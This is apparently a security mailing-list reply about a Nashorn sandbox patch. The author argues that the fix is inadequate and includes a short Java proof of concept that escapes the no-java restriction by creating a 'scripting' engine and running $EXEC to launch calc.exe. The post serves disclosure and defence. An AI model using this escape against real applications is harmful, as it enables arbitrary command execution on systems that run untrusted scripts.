Hi,
interesting that they "fixed" this issue now. Way back
(<https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/>) reporting
something similar, I was told that Nashorn "sandboxing" was not supposed
to be secure unless you also configure a SecurityManager (which
implicitly suppresses the "engine" property). Restrictions purely based
on a ClassFilter have been broken ever since then.
And the patch really does not address the fundamental issue, which is
that you are able to get and configure a new engine. While the change
may stop you from suppressing the inherited no-java flag, why not get
direct command execution using another option instead:
System.setProperty("nashorn.args", "--no-java");
ScriptEngine e = new ScriptEngineManager().getEngineByName("nashorn");
String cmd =
"this.engine.factory.getScriptEngine(\"scripting\").eval('$EXEC(\"calc.exe\")')";
e.eval(cmd);
So, imho, the proper advice still should be not to use Nashorn for
running untrusted code.
best regards
Moritz
